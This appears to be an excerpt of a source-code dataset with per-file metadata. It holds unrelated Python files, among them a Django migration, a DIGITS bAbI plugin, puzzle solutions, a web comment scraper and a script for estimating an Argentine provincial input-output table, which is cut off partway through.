self.key_info = key_info
elif x509_data:
self.key_info = KeyInfo(x509_data=x509_data)
else:
self.key_info = []
self.verify_depth = verify_depth
#self.x509_data = x509_data
def spcertenc_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SPCertEncType_, xml_string)
class SPCertEnc(SPCertEncType_):
"""The urn:net:eustix:names:tc:PEFIM:0.0:assertion:SPCertEnc element """
c_tag = 'SPCertEnc'
c_namespace = NAMESPACE
c_children = SPCertEncType_.c_children.copy()
c_attributes = SPCertEncType_.c_attributes.copy()
c_child_order = SPCertEncType_.c_child_order[:]
c_cardinality = SPCertEncType_.c_cardinality.copy()
def spcertenc_from_string(xml_string):
return saml2.create_class_from_xml_string(SPCertEnc, xml_string)
ELEMENT_FROM_STRING = {
SPCertEnc.c_tag: spcertenc_from_string,
SPCertEncType_.c_tag: spcertenc_type__from_string,
}
ELEMENT_BY_TAG = {
'SPCertEnc': SPCertEnc,
'SPCertEncType': SPCertEncType_,
}
def factory(tag, **kwargs):
return ELEMENT_BY_TAG[tag](**kwargs)
| 31.428571
| 80
| 0.654959
| 1,743
| 0.720248
| 0
| 0
| 0
| 0
| 0
| 0
| 417
| 0.172314
|
42144545d417abe762a3d9307033d86aace5b332
| 805
|
py
|
Python
|
ontask/migrations/0004_remove_old_migration_refs.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 33
|
2017-12-02T04:09:24.000Z
|
2021-11-07T08:41:57.000Z
|
ontask/migrations/0004_remove_old_migration_refs.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 189
|
2017-11-16T04:06:29.000Z
|
2022-03-11T23:35:59.000Z
|
ontask/migrations/0004_remove_old_migration_refs.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 30
|
2017-11-30T03:35:44.000Z
|
2022-01-31T03:08:08.000Z
|
# Generated by Django 2.2.4 on 2019-08-24 06:02
from django.db import connection as con, migrations
from psycopg2 import sql
def remove_old_migration_refs(apps, schema_editor):
__sql_delete_migration_ref = 'DELETE FROM django_migrations WHERE app={0}'
old_apps = [
'action', 'core', 'dataops', 'logs', 'oauth', 'ontask_oauth',
'profiles', 'scheduler', 'table', 'workflow']
with con.cursor() as cursor:
for app_name in old_apps:
cursor.execute(
sql.SQL(__sql_delete_migration_ref).format(
sql.Literal(app_name)))
class Migration(migrations.Migration):
dependencies = [
('ontask', '0003_transfer_siteprefs'),
]
operations = [
migrations.RunPython(code=remove_old_migration_refs),
]
| 26.833333
| 78
| 0.650932
| 201
| 0.249689
| 0
| 0
| 0
| 0
| 0
| 0
| 213
| 0.264596
|
42149897d0b37e2db558007492da879e2a80968d
| 639
|
py
|
Python
|
scripts/tfloc_summary.py
|
lldelisle/bx-python
|
19ab41e0905221e3fcaaed4b74faf2d7cda0d15a
|
[
"MIT"
] | 122
|
2015-07-01T12:00:22.000Z
|
2022-03-02T09:27:35.000Z
|
scripts/tfloc_summary.py
|
lldelisle/bx-python
|
19ab41e0905221e3fcaaed4b74faf2d7cda0d15a
|
[
"MIT"
] | 64
|
2015-11-06T21:03:18.000Z
|
2022-03-24T00:55:27.000Z
|
scripts/tfloc_summary.py
|
lldelisle/bx-python
|
19ab41e0905221e3fcaaed4b74faf2d7cda0d15a
|
[
"MIT"
] | 60
|
2015-10-05T19:19:36.000Z
|
2021-11-19T20:53:54.000Z
|
#!/usr/bin/env python
"""
Read TFLOC output from stdin and write out a summary in which the nth line
contains the number of sites found in the nth alignment of the input.
TODO: This is very special case, should it be here?
"""
import sys
from collections import defaultdict
counts = defaultdict(int)
max_index = -1
for line in sys.stdin:
if line[0].isdigit():
current_index = int(line)
max_index = max(current_index, max_index)
elif line[0] == "'":
counts[current_index] += 1
else:
raise ValueError("Invalid input line " + line)
for i in range(max_index + 1):
print(counts.get(i, 0))
| 22.821429
| 74
| 0.674491
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 250
| 0.391236
|
4214b1ee9bcb816a48babcc6e1d8cfe461c7c2c0
| 3,649
|
py
|
Python
|
plugins/data/bAbI/digitsDataPluginBAbI/data.py
|
Linda-liugongzi/DIGITS-digits-py3
|
6df5eb6972574a628b9544934518ec8dfa9c7439
|
[
"BSD-3-Clause"
] | null | null | null |
plugins/data/bAbI/digitsDataPluginBAbI/data.py
|
Linda-liugongzi/DIGITS-digits-py3
|
6df5eb6972574a628b9544934518ec8dfa9c7439
|
[
"BSD-3-Clause"
] | null | null | null |
plugins/data/bAbI/digitsDataPluginBAbI/data.py
|
Linda-liugongzi/DIGITS-digits-py3
|
6df5eb6972574a628b9544934518ec8dfa9c7439
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
import os
from digits.utils import subclass, override, constants
from digits.extensions.data.interface import DataIngestionInterface
from .forms import DatasetForm, InferenceForm
from . import utils
from flask_babel import lazy_gettext as _
DATASET_TEMPLATE = "templates/dataset_template.html"
INFERENCE_TEMPLATE = "templates/inference_template.html"
@subclass
class DataIngestion(DataIngestionInterface):
"""
A data ingestion extension for the bAbI dataset
"""
def __init__(self, is_inference_db=False, **kwargs):
super(DataIngestion, self).__init__(**kwargs)
self.userdata['is_inference_db'] = is_inference_db
if 'train_text_data' not in self.userdata:
# get task ID
try:
task_id = int(self.task_id)
except:
task_id = None
self.userdata['task_id'] = task_id
# get data - this doesn't scale well to huge datasets but this makes it
# straightforard to create a mapping of words to indices and figure out max
# dimensions of stories and sentences
self.userdata['train_text_data'] = utils.parse_folder_phase(
self.story_folder, task_id, train=True)
self.userdata['stats'] = utils.get_stats(self.userdata['train_text_data'])
@override
def encode_entry(self, entry):
stats = self.userdata['stats']
return utils.encode_sample(entry, stats['word_map'], stats['sentence_size'], stats['story_size'])
@staticmethod
@override
def get_category():
return "Text"
@staticmethod
@override
def get_id():
return "text-babi"
@staticmethod
@override
def get_dataset_form():
return DatasetForm()
@staticmethod
@override
def get_dataset_template(form):
"""
parameters:
- form: form returned by get_dataset_form(). This may be populated
with values if the job was cloned
return:
- (template, context) tuple
- template is a Jinja template to use for rendering dataset creation
options
- context is a dictionary of context variables to use for rendering
the form
"""
extension_dir = os.path.dirname(os.path.abspath(__file__))
template = open(os.path.join(extension_dir, DATASET_TEMPLATE), "r").read()
context = {'form': form}
return (template, context)
@override
def get_inference_form(self):
return InferenceForm()
@staticmethod
@override
def get_inference_template(form):
extension_dir = os.path.dirname(os.path.abspath(__file__))
template = open(os.path.join(extension_dir, INFERENCE_TEMPLATE), "r").read()
context = {'form': form}
return (template, context)
@staticmethod
@override
def get_title():
return _("bAbI")
@override
def itemize_entries(self, stage):
entries = []
if not self.userdata['is_inference_db']:
data = self.userdata['train_text_data']
n_val_entries = int(len(data)*self.pct_val/100)
if stage == constants.TRAIN_DB:
entries = data[n_val_entries:]
elif stage == constants.VAL_DB:
entries = data[:n_val_entries]
elif stage == constants.TEST_DB:
if not bool(self.snippet):
raise ValueError("You must write a story and a question")
entries = utils.parse_lines(str(self.snippet).splitlines())
return entries
| 31.730435
| 105
| 0.636339
| 3,216
| 0.881337
| 0
| 0
| 3,226
| 0.884078
| 0
| 0
| 1,033
| 0.283091
|
4216517a1b9daa01aa443bee25e4880a6b96ed43
| 3,767
|
py
|
Python
|
13_TransparentOrigami/fold2.py
|
dandrianneDEL/PyAdventOfCode2021
|
ea91186383c0855c81c7243d527de0c4dd4c0afb
|
[
"MIT"
] | null | null | null |
13_TransparentOrigami/fold2.py
|
dandrianneDEL/PyAdventOfCode2021
|
ea91186383c0855c81c7243d527de0c4dd4c0afb
|
[
"MIT"
] | null | null | null |
13_TransparentOrigami/fold2.py
|
dandrianneDEL/PyAdventOfCode2021
|
ea91186383c0855c81c7243d527de0c4dd4c0afb
|
[
"MIT"
] | null | null | null |
import filehelper
fileResult = filehelper.readfile()
class Matrix:
cells: list[list[bool]]
maxX: int
maxY: int
def __init__(self, sizeX:int, sizeY:int) -> None:
self.cells = []
self.maxX = sizeX
self.maxY = sizeY
# print(f"INIT matrix {sizeX}x{sizeY}")
for y in range(sizeY+1):
row = [False] * (sizeX+1)
self.cells.append(row)
def fill_coords(self, coords:list[int]) -> None:
for carthesianCoordinate in coords:
x = carthesianCoordinate[0]
y = carthesianCoordinate[1]
self.cells[y][x] = True
def subselect(self, xStart:int, yStart:int, xMax:int, yMax:int, translateX: int, translateY: int) -> 'Matrix':
print(f"x={xStart}-{xMax}, y={yStart}-{yMax}")
newMatrix = Matrix(xMax-xStart, yMax-yStart)
coords = []
for x in range(xStart,xMax+1):
for y in range(yStart, yMax+1):
if self.cells[y][x]:
coords.append([x-translateX, y-translateY])
print(f"part coords(translateY={translateY}): {coords}")
newMatrix.fill_coords(coords)
return newMatrix
def merge_y(self, half2:'Matrix')->'Matrix':
merged = Matrix(self.maxX, self.maxY-1)
coords = []
# populate cell if either folds are populated
for x in range(self.maxX+1):
for y in range(self.maxY):
if self.cells[y][x] or half2.cells[half2.maxY-y][x]:
coords.append([x,y])
merged.fill_coords(coords)
return merged
def merge_x(self, half2:'Matrix')->'Matrix':
merged = Matrix(self.maxX-1, self.maxY)
coords = []
for x in range(self.maxX):
for y in range(self.maxY+1):
if self.cells[y][x] or half2.cells[y][half2.maxX-x]:
coords.append([x,y])
merged.fill_coords(coords)
return merged
def fold(self, fold) -> 'Matrix':
if fold[0] == 'y':
yAxisToFold = fold[1]
self.print(yAxisToFold, -1)
merged = self.fold_y(yAxisToFold)
else:
xAxisToFold = fold[1]
self.print(-1, xAxisToFold)
merged = self.fold_x(xAxisToFold)
merged.print(-1, -1)
return merged
def fold_y(self, y:int) -> 'Matrix':
half1 = self.subselect(0, 0, self.maxX, y, 0, 0)
half2 = self.subselect(0, y, self.maxX, self.maxY, 0, y)
return half1.merge_y(half2)
def fold_x(self, x:int) -> 'Matrix':
half1 = self.subselect(0, 0, x, self.maxY, 0, 0)
half2 = self.subselect(x, 0, self.maxX, self.maxY, x, 0)
return half1.merge_x(half2)
def print(self, splitY:int, splitX:int) -> None:
for y in range(len(self.cells)):
row = self.cells[y]
txt = ""
for x in range(len(row)):
flag = row[x]
if y == splitY:
txt += "-"
elif x == splitX:
txt += "|"
elif flag:
txt += "#"
else:
txt += f"."
print(txt)
# ******************************************
# PART 2 - Fold plastic transparent sheet
# Finish folding the transparent paper according to the instructions. The manual says the code is always eight capital letters.
# What code do you use to activate the infrared thermal imaging camera system?
# ******************************************
matrix = Matrix(fileResult.maxX, fileResult.maxY)
matrix.fill_coords(fileResult.coords)
# Perform folds
for fold in fileResult.folds:
print(f"performing fold {fold}")
matrix = matrix.fold(fold)
| 34.87963
| 127
| 0.535439
| 3,169
| 0.841253
| 0
| 0
| 0
| 0
| 0
| 0
| 628
| 0.166711
|
421750365075d0ccd2892de6546549e569376c1b
| 208
|
py
|
Python
|
complete/01 - 10/Problem1/main.py
|
this-jacob/project-euler
|
8f9e700e2875e84d081eade44fd2107db0a0ae12
|
[
"MIT"
] | null | null | null |
complete/01 - 10/Problem1/main.py
|
this-jacob/project-euler
|
8f9e700e2875e84d081eade44fd2107db0a0ae12
|
[
"MIT"
] | null | null | null |
complete/01 - 10/Problem1/main.py
|
this-jacob/project-euler
|
8f9e700e2875e84d081eade44fd2107db0a0ae12
|
[
"MIT"
] | null | null | null |
def main():
total = 0
for i in range(0, 1000):
if i % 3 == 0:
total += i
elif i % 5 == 0:
total += i
print(total)
if __name__ == '__main__':
main()
| 13.866667
| 28
| 0.408654
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.048077
|
4218d80702b95a80fa35592557c09dc27cf8233c
| 206
|
py
|
Python
|
reward/batcher/transforms/base_transform.py
|
lgvaz/torchrl
|
cfff8acaf70d1fec72169162b95ab5ad3547d17a
|
[
"MIT"
] | 5
|
2018-06-21T14:33:40.000Z
|
2018-08-18T02:26:03.000Z
|
reward/batcher/transforms/base_transform.py
|
lgvaz/reward
|
cfff8acaf70d1fec72169162b95ab5ad3547d17a
|
[
"MIT"
] | null | null | null |
reward/batcher/transforms/base_transform.py
|
lgvaz/reward
|
cfff8acaf70d1fec72169162b95ab5ad3547d17a
|
[
"MIT"
] | 2
|
2018-05-08T03:34:49.000Z
|
2018-06-22T15:04:17.000Z
|
class BaseTransform:
def transform_s(self, s, training=True):
return s
def transform_batch(self, batch, training=True):
return batch
def write_logs(self, logger):
pass
| 20.6
| 52
| 0.645631
| 205
| 0.995146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
4219aa019cf5a624b152bb0ddf85c0a457ed2c73
| 2,416
|
py
|
Python
|
webapp/scan_comments.py
|
ctrl-meta-f/ngk
|
6d9122ee84cc7420f9b135556c7b03e9b20428e4
|
[
"BSD-2-Clause"
] | null | null | null |
webapp/scan_comments.py
|
ctrl-meta-f/ngk
|
6d9122ee84cc7420f9b135556c7b03e9b20428e4
|
[
"BSD-2-Clause"
] | null | null | null |
webapp/scan_comments.py
|
ctrl-meta-f/ngk
|
6d9122ee84cc7420f9b135556c7b03e9b20428e4
|
[
"BSD-2-Clause"
] | null | null | null |
import logging
import time
import requests
import lxml.etree
import re
import os
from schema import ScopedSession, SyncState
logging.basicConfig(
filename=os.getenv("LOG_FILE", "../logs/scan_comments.log"),
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.DEBUG)
COMMENTS_URL = "http://govnokod.ru/comments"
FAST_DELAY = 15
SLOW_DELAY = 60
FAST_TO_SLOW_STEPS = 20
def fetch_latest_comments():
logging.debug("Fetching comments...")
r = requests.get(COMMENTS_URL)
r.raise_for_status()
root = lxml.etree.HTML(r.content)
comments = []
for link in root.xpath('//a[@class="comment-link"]'):
m = re.search("/([0-9]+)#comment([0-9]+)", link.get("href"))
post_id = int(m.group(1))
comment_id = int(m.group(2))
comments.append((post_id, comment_id))
return comments
def update_sync_states(comments):
has_updates = False
with ScopedSession() as session:
for post_id, comment_id in comments:
state = session.query(SyncState).filter(SyncState.post_id == post_id).one_or_none()
if not state:
logging.info("Got new comment %d for new post %d", comment_id, post_id)
has_updates = True
state = SyncState(post_id=post_id, last_comment_id=comment_id, pending=True, priority=SyncState.PRIORITY_HAS_COMMENTS)
session.add(state)
else:
if state.last_comment_id is None or comment_id > state.last_comment_id:
logging.info("Got new comment %d for post %d", comment_id, post_id)
has_updates = True
state.last_comment_id = comment_id
state.pending = True
state.priority=SyncState.PRIORITY_HAS_COMMENTS
return has_updates
logging.info("=== started ===")
fast_requests = 0
while True:
try:
comments = fetch_latest_comments()
has_updates = update_sync_states(comments)
if has_updates:
fast_requests = FAST_TO_SLOW_STEPS
except Exception as e:
logging.exception(e)
fast_requests = 0
if fast_requests > 0:
delay = FAST_DELAY
fast_requests -= 1
else:
delay = SLOW_DELAY
logging.debug("Sleeping for %d seconds (%d fast requests left)...", delay, fast_requests)
time.sleep(delay)
| 29.463415
| 134
| 0.631623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 344
| 0.142384
|
421a32da4769d80ffba1268d31b7a676642e60fc
| 1,009
|
py
|
Python
|
s3prl/upstream/example/hubconf.py
|
hhhaaahhhaa/s3prl
|
a469787f05c42196c4d989555082f5fd9dcbe8a6
|
[
"Apache-2.0"
] | 856
|
2021-01-15T15:40:32.000Z
|
2022-03-31T07:08:17.000Z
|
s3prl/upstream/example/hubconf.py
|
hhhaaahhhaa/s3prl
|
a469787f05c42196c4d989555082f5fd9dcbe8a6
|
[
"Apache-2.0"
] | 210
|
2021-01-15T13:28:50.000Z
|
2022-03-30T06:13:51.000Z
|
s3prl/upstream/example/hubconf.py
|
hhhaaahhhaa/s3prl
|
a469787f05c42196c4d989555082f5fd9dcbe8a6
|
[
"Apache-2.0"
] | 208
|
2021-01-15T03:03:12.000Z
|
2022-03-31T08:33:27.000Z
|
from .expert import UpstreamExpert as _UpstreamExpert
def customized_upstream(*args, **kwargs):
"""
To enable your customized pretrained model, you only need to implement
upstream/example/expert.py and leave this file as is. This file is
used to register the UpstreamExpert in upstream/example/expert.py
The following is a brief introduction of the registration mechanism.
The s3prl/hub.py will collect all the entries registered in this file
(callable variables without the underscore prefix) as a centralized
upstream factory. One can pick up this upstream from the factory via
1.
from s3prl.hub import customized_upstream
model = customized_upstream(ckpt, model_config)
2.
model = torch.hub.load(
'your_s3prl_path',
'customized_upstream',
ckpt,
model_config,
source='local',
)
Our run_downstream.py and downstream/runner.py follows the first usage
"""
return _UpstreamExpert(*args, **kwargs)
| 32.548387
| 74
| 0.716551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 862
| 0.854311
|
421a86ab2fcc5ca9b6f576b1a9c163c17517de0f
| 463
|
py
|
Python
|
g-code-testing/g_code_parsing/g_code_functionality_defs/thermocycler/set_ramp_rate_g_code_functionality_def.py
|
Opentrons/protocol_framework
|
ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f
|
[
"Apache-2.0"
] | null | null | null |
g-code-testing/g_code_parsing/g_code_functionality_defs/thermocycler/set_ramp_rate_g_code_functionality_def.py
|
Opentrons/protocol_framework
|
ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f
|
[
"Apache-2.0"
] | null | null | null |
g-code-testing/g_code_parsing/g_code_functionality_defs/thermocycler/set_ramp_rate_g_code_functionality_def.py
|
Opentrons/protocol_framework
|
ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict
from g_code_parsing.g_code_functionality_defs.g_code_functionality_def_base import (
GCodeFunctionalityDefBase,
)
class SetRampRateGCodeFunctionalityDef(GCodeFunctionalityDefBase):
@classmethod
def _generate_command_explanation(cls, g_code_args: Dict[str, str]) -> str:
return (
"Setting thermocycler ramp rate."
"\nNote: This is an unimplemented feature, setting this does nothing"
)
| 33.071429
| 84
| 0.740821
| 318
| 0.686825
| 0
| 0
| 247
| 0.533477
| 0
| 0
| 102
| 0.220302
|
421c7e1609af23f9ed8e7709fd3cc2ca7ae61d73
| 19,452
|
py
|
Python
|
src/mrio.py
|
ElcoK/MRIA_Argentina
|
45194eb738c725276c3667078ac8d229554b550e
|
[
"MIT"
] | null | null | null |
src/mrio.py
|
ElcoK/MRIA_Argentina
|
45194eb738c725276c3667078ac8d229554b550e
|
[
"MIT"
] | null | null | null |
src/mrio.py
|
ElcoK/MRIA_Argentina
|
45194eb738c725276c3667078ac8d229554b550e
|
[
"MIT"
] | 2
|
2021-06-28T11:51:17.000Z
|
2022-01-10T06:49:01.000Z
|
import os,sys
import pandas as pd
import numpy as np
import subprocess
from tqdm import tqdm
from ras_method import ras_method
import warnings
warnings.filterwarnings('ignore')
def est_trade_value(x,output_new,sector):
"""
Function to estimate the trade value between two sectors
"""
if (sector is not 'other1') & (sector is not 'other2'):
sec_output = output_new.sum(axis=1).loc[output_new.sum(axis=1).index.get_level_values(1) == sector].reset_index()
else:
sec_output = output_new.sum(axis=1).loc[output_new.sum(axis=1).index.get_level_values(1) == 'IMP'].reset_index()
x['gdp'] = x.gdp*min(sec_output.loc[sec_output.region==x.reg1].values[0][2],sec_output.loc[sec_output.region==x.reg2].values[0][2])
return x
def estimate(table='INDEC',year=2015,print_output=False,print_progress=True):
"""
Function to create a province-level MRIO table, based on a national IO table. The default is the INDEC table.
"""
data_path = os.path.join('..','data')
# load sector data
sectors = list(pd.read_excel(os.path.join(data_path,'other_sources',
'industry_high_level_classification.xlsx'))['SEC_CODE'].values)
# load provincial mappers
reg_mapper = pd.read_excel(os.path.join(data_path,'INDEC','sh_cou_06_16.xls'),sheet_name='reg_mapper',header=None).iloc[:,:2]
reg_mapper = dict(zip(reg_mapper[0],reg_mapper[1]))
# load provincial data
prov_data = pd.read_excel(os.path.join(data_path,'INDEC','PIB_provincial_06_17.xls'),sheet_name='VBP',
skiprows=3,index_col=[0],header=[0],nrows=71)
prov_data = prov_data.loc[[x.isupper() for x in prov_data.index],:]
prov_data.columns = [x.replace(' ','_') for x in ['Ciudad de Buenos Aires', 'Buenos Aires', 'Catamarca', 'Cordoba',
'Corrientes', 'Chaco', 'Chubut', 'Entre Rios', 'Formosa', 'Jujuy',
'La Pampa', 'La Rioja', 'Mendoza', 'Misiones', 'Neuquen', 'Rio Negro',
'Salta', 'San Juan', 'San Luis', 'Santa Cruz', 'Santa Fe',
'Santiago del Estero', 'Tucuman', 'Tierra del Fuego',
'No distribuido', 'Total']]
region_names = list(prov_data.columns)[:-2]
prov_data.index = sectors+['TOTAL']
prov_data = prov_data.replace(0, 1)
### Create proxy data for first iteration
sectors+['other1','other2']
# proxy level 2
proxy_reg_arg = pd.DataFrame(prov_data.iloc[-1,:24]/prov_data.iloc[-1,:24].sum()).reset_index()
proxy_reg_arg['year'] = 2016
proxy_reg_arg = proxy_reg_arg[['year','index','TOTAL']]
proxy_reg_arg.columns = ['year','id','gdp']
proxy_reg_arg.to_csv(os.path.join('..','mrio_downscaling','proxy_reg_arg.csv'),index=False)
# proxy level 4
for iter_,sector in enumerate(sectors+['other1','other2']):
if (sector is not 'other1') & (sector is not 'other2'):
proxy_sector = pd.DataFrame(prov_data.iloc[iter_,:24]/prov_data.iloc[iter_,:24].sum()).reset_index()
proxy_sector['year'] = 2016
proxy_sector['sector'] = 'sec{}'.format(sector)
proxy_sector = proxy_sector[['year','sector','index',sector]]
proxy_sector.columns = ['year','sector','region','gdp']
proxy_sector.to_csv(os.path.join('..','mrio_downscaling','proxy_sec{}.csv'.format(sector)),index=False)
else:
proxy_sector = pd.DataFrame(prov_data.iloc[-1,:24]/prov_data.iloc[-1,:24].sum()).reset_index()
proxy_sector['year'] = 2016
proxy_sector['sector'] = sector+'1'
proxy_sector = proxy_sector[['year','sector','index','TOTAL']]
proxy_sector.columns = ['year','sector','region','gdp']
proxy_sector.to_csv(os.path.join('..','mrio_downscaling','proxy_{}.csv'.format(sector)),index=False)
# proxy level 18
def change_name(x):
if x in sectors:
return 'sec'+x
elif x == 'other1':
return 'other11'
else:
return 'other21'
mi_index = pd.MultiIndex.from_product([sectors+['other1','other2'], region_names, sectors+['other1','other2'], region_names],
names=['sec1', 'reg1','sec2','reg2'])
for iter_,sector in enumerate(sectors+['other1','other2']):
if (sector is not 'other1') & (sector is not 'other2'):
proxy_trade = pd.DataFrame(columns=['year','gdp'],index= mi_index).reset_index()
proxy_trade['year'] = 2016
proxy_trade['gdp'] = 0
proxy_trade = proxy_trade.query("reg1 != reg2")
proxy_trade = proxy_trade.loc[proxy_trade.sec1 == sector]
proxy_trade['sec1'] = proxy_trade.sec1.apply(change_name)
proxy_trade['sec2'] = proxy_trade.sec2.apply(change_name)
proxy_trade = proxy_trade[['year','sec1','reg1','sec2','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','sector','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade_sec{}.csv'.format(sector)),index=False)
else:
proxy_trade = pd.DataFrame(columns=['year','gdp'],index= mi_index).reset_index()
proxy_trade['year'] = 2016
proxy_trade['gdp'] = 0
proxy_trade = proxy_trade.query("reg1 != reg2")
proxy_trade = proxy_trade.loc[proxy_trade.sec1 == sector]
proxy_trade['sec1'] = proxy_trade.sec1.apply(change_name)
proxy_trade['sec2'] = proxy_trade.sec2.apply(change_name)
proxy_trade = proxy_trade[['year','sec1','reg1','sec2','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','sector','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade_{}.csv'.format(sector)),index=False)
"""
Create first version of MRIO for Argentina, without trade
"""
### save basetable for disaggregation usin the specific source:
basetable = pd.read_csv(os.path.join(data_path,'national_tables','{}_{}.csv'.format(year,table)),index_col=[0])
basetable.to_csv(os.path.join('..','mrio_downscaling','basetable.csv'),header=False,index=False)
### run libmrio
p = subprocess.Popen([r'..\mrio_downscaling\mrio_disaggregate', 'settings_notrade.yml'],
cwd=os.path.join('..','mrio_downscaling'))
p.wait()
### load data and reorder
region_names_list = [item for sublist in [[x]*(len(sectors)+2) for x in region_names]
for item in sublist]
rows = ([x for x in sectors+['VA','IMP']])*len(region_names)
cols = ([x for x in sectors+['FD','EXP']])*len(region_names)
index_mi = pd.MultiIndex.from_arrays([region_names_list, rows], names=('region', 'row'))
column_mi = pd.MultiIndex.from_arrays([region_names_list, cols], names=('region', 'col'))
MRIO = pd.read_csv(os.path.join('..','mrio_downscaling','output1.csv'),header=None,index_col=None)
MRIO.index = index_mi
MRIO.columns = column_mi
# create predefined index and col, which is easier to read
sector_only = [x for x in sectors]*len(region_names)
col_only = ['FD']*len(region_names)
region_col = [item for sublist in [[x]*len(sectors) for x in region_names] for item in sublist] + \
[item for sublist in [[x]*1 for x in region_names] for item in sublist]
column_mi_reorder = pd.MultiIndex.from_arrays(
[region_col, sector_only+col_only], names=('region', 'col'))
# sum va and imports
valueA = MRIO.xs('VA', level=1, axis=0).sum(axis=0)
valueA.drop('FD', level=1,axis=0,inplace=True)
valueA.drop('EXP', level=1,axis=0,inplace=True)
imports = MRIO.xs('IMP', level=1, axis=0).sum(axis=0)
imports.drop('FD', level=1,axis=0,inplace=True)
imports.drop('EXP', level=1,axis=0,inplace=True)
FinalD = MRIO.xs('FD', level=1, axis=1).sum(axis=1)
FinalD.drop('VA', level=1,axis=0,inplace=True)
FinalD.drop('IMP', level=1,axis=0,inplace=True)
Export = MRIO.xs('EXP', level=1, axis=1).sum(axis=1)
Export.drop('VA', level=1,axis=0,inplace=True)
Export.drop('IMP', level=1,axis=0,inplace=True)
output_new = MRIO.copy()
"""
Balance first MRIO version
"""
# convert to numpy matrix
X0 = MRIO.as_matrix()
# get sum of rows and columns
u = X0.sum(axis=1)
v = X0.sum(axis=0)
# and only keep T
v[:(len(u)-2)] = u[:-2]
# apply RAS method to rebalance the table
X1 = ras_method(X0, u, v, eps=1e-5,print_out=print_output)
#translate to pandas dataframe
output_new = pd.DataFrame(X1)
output_new.index = index_mi
output_new.columns = column_mi
if print_progress:
print('NOTE : Balanced MRIO table without trade finished using {} data'.format(table))
"""
Create second version of MRIO for Argentina, with trade
"""
### Load OD matrix
od_matrix_total = pd.DataFrame(pd.read_excel(os.path.join(data_path,'OD_data','province_ods.xlsx'),
sheet_name='total',index_col=[0,1],usecols =[0,1,2,3,4,5,6,7])).unstack(1).fillna(0)
od_matrix_total.columns.set_levels(['A','G','C','D','B','I'],level=0,inplace=True)
od_matrix_total.index = od_matrix_total.index.map(reg_mapper)
od_matrix_total = od_matrix_total.stack(0)
od_matrix_total.columns = od_matrix_total.columns.map(reg_mapper)
od_matrix_total = od_matrix_total.swaplevel(i=-2, j=-1, axis=0)
od_matrix_total = od_matrix_total.loc[:, od_matrix_total.columns.notnull()]
### Create proxy data
# proxy level 14
mi_index = pd.MultiIndex.from_product([sectors+['other1','other2'], region_names, region_names],
names=['sec1', 'reg1','reg2'])
for iter_,sector in enumerate((sectors+['other1','other2'])):
if sector in ['A','G','C','D','B','I']:
proxy_trade = (od_matrix_total.sum(level=1).divide(od_matrix_total.sum(level=1).sum(axis=1),axis='rows')).stack(0).reset_index()
proxy_trade.columns = ['reg1','reg2','gdp']
proxy_trade['year'] = 2016
proxy_trade = proxy_trade.apply(lambda x: est_trade_value(x,output_new,sector),axis=1)
proxy_trade['sec1'] = 'sec{}'.format(sector)
proxy_trade = proxy_trade[['year','sec1','reg1','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade14_sec{}.csv'.format(sector)),index=False)
elif (sector is not 'other1') & (sector is not 'other2') & (sector not in ['A','G','C','D','B','I']): # & (sector not in ['L','M','N','O','P']):
proxy_trade = (od_matrix_total.sum(level=1).divide(od_matrix_total.sum(level=1).sum(axis=1),axis='rows')).stack(0).reset_index()
#proxy_trade[0].loc[(proxy_trade.origin_province == proxy_trade.destination_province)] = 0.9
#proxy_trade[0].loc[~(proxy_trade.origin_province == proxy_trade.destination_province)] = 0.1
proxy_trade.columns = ['reg1','reg2','gdp']
proxy_trade['year'] = 2016
proxy_trade = proxy_trade.apply(lambda x: est_trade_value(x,output_new,sector),axis=1)
proxy_trade['sec1'] = 'sec{}'.format(sector)
proxy_trade = proxy_trade[['year','sec1','reg1','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade14_sec{}.csv'.format(sector)),index=False)
else:
proxy_trade = (od_matrix_total.sum(level=1).divide(od_matrix_total.sum(level=1).sum(axis=1),axis='rows')).stack(0).reset_index()
proxy_trade.columns = ['reg1','reg2','gdp']
proxy_trade['year'] = 2016
proxy_trade = proxy_trade.apply(lambda x: est_trade_value(x,output_new,sector),axis=1)
proxy_trade['sec1'] = sector+'1'
proxy_trade = proxy_trade[['year','sec1','reg1','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade14_{}.csv'.format(sector)),index=False)
# proxy level 18
mi_index = pd.MultiIndex.from_product([sectors+['other1','other2'], region_names, sectors+['other1','other2'], region_names],
names=['sec1', 'reg1','sec2','reg2'])
for iter_,sector in enumerate((sectors+['other1','other2'])):
if (sector is not 'other1') & (sector is not 'other2'):
proxy_trade = pd.DataFrame(columns=['year','gdp'],index= mi_index).reset_index()
proxy_trade['year'] = 2016
proxy_trade['gdp'] = 0
proxy_trade = proxy_trade.query("reg1 != reg2")
proxy_trade = proxy_trade.loc[proxy_trade.sec1 == sector]
